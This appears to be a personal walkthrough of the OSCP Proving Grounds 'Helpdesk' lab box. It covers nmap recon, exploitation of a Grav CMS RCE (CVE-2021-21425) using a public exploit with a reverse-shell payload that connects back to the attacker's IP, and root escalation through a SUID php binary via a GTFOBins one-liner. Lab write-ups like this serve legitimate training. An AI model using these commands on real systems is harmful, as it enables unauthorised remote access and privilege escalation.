CTF1

OSCP Proving Grounds Helpdesk Writeup (Linux)

Recon (Enumeration)

nmap --min-rate 3000 -p- 192.168.115.12 -Pn -sV -sC

We Find only two ports open.

Seems to have a folder exposed to us.

It seems like some sort of CMS, though I have no idea what this is.

Lets see if we can find a version number and see if there are any RCE's associated with "Grav".

While doing some research I came across the folowing article which leads me to /admin.

Based on that article I was able to seemingly replicate the POC of the RCE

As a reminder the admin nonce is a hidden field in the form.

So given a 200, i suppose this CMS is vulnerable.

After doing a little bit more research, I found a POC online: https://github.com/CsEnox/CVE-2021-21425/blob/main/exploit.py

After a little bit of fiddling around I ran the following command. For the Ub3r Lazy : https://www.revshells.com/

python3 exploit.py -c "sh -i >& /dev/tcp/192.168.49.115/12345 0>&1" -t http://192.168.115.12/grav-admin

and...

We have a Shell!

After running linpeas we find a few interesting pieces of information

I attempted to priv esc with cron jobs but no luck.

After more recon I discovered a password hash

After spending many hours trying to crack this hash it was pointless.

For some reason I circled back and decided to look for SUID binaries manually, because why not?

So here is my frustration:

ALWAYS CHECK SUID BINARIES MANUALLY.

ALWAYS.

IDC WHAT YOU SAY. MANUAL.

FML

Anyway here is a link to that:

We notice that /usr/bin/php7.4 this stands out

We find where the binary is: /usr/bin/

And based on GTFOBins we can just run ./php -r "pcntl_exec('/bin/sh', ['-p']);"

im still kind of mad... Linpeas didnt pick it up.

Last updated 1 year ago